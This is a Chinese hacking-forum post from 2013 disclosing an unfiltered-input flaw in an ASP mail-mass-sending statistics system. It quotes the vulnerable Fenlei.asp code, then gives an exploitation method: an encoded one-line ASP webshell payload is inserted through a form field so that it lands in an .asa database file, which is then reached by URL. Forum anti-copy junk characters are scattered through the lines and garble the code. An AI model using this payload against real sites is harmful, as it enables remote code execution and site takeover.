找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1821|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
4 R5 m3 [  d; l' r. X, Y2 ~) ~7 ?" |4 _) N0 H4 u
IF Request.QueryString("Action")="del" Then $ U& K. V# k4 I. Y8 ?0 m9 L4 n
ID=Request.QueryString("ID")
! C2 A& J. G& `IF Countss ("tui","Fenlei",ID )<>0 then ' ?1 r5 d9 w5 w
'略
. X3 u/ I+ [; d) @  I. gIF Request.QueryString("Action")="Add" Then
& o2 J/ h  Z% y7 K9 p% dTname=Request.Form("Typename") / o; G% w; \/ j/ `
Set Rs=Server.CreateObject("adodb.Recordset") $ m7 E2 ]- ]& {- P
Sql="Select * From Fenlei Order by id Desc "
1 Z9 ]' _' L2 |" qRs.Open Sql,Conn,1,3
- B# ~8 h! ^" ]Rs.Addnew $ O& R; M# i) `  R" b- A! v
Rs("Typename")=Tname 9 A$ _: S% J! B- S3 I4 f& }
'略 1 _- X$ q2 M5 G  w4 u1 w
Set Rs=Server.CreateObject("adodb.Recordset")
* Z: ~$ \) w( M( ^- z; r# oSql="Select * From Fenlei Order by id Desc "
& [" k# R) I' [5 P# e% ERs.Open Sql,Conn,1,1 6 E' Z' P' `4 P; ^
'略 $ ~' X$ u8 s1 s7 y  P
%>
1 h" R3 K* B) H6 N* f! b' J5 `' q & N+ Y) Z4 o' h3 b8 ?/ C
0 A( [" T8 o* y( H- u7 K' f/ R( w  K" o

4 R! m. \( J' J* N* U* T没有过滤,直接写入数据库。( W. Q, N1 e/ |
8 C8 x9 X: a& S3 Q' t
利用方法:
5 |' P; @; f3 r, Q% X& ~
/ L7 \# ?# e, O" h' `5 N# B" f, Q插入:┼攠數畣整爠煥敵瑳∨≡┩>* S, Q+ L) w7 C. p& e
- x2 Z; z5 P1 q5 g5 p: \, A( Z
3 d0 v; f0 F, T. Z/ @0 A2 [7 B
连接: http://www.xxx.com/###tongbaner.asa $ q1 h% t! W5 L" F; z  w1 Q
'默认安装文件: ; n6 L# c4 K  I) \
'install.asp
; F' g# `2 \' @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表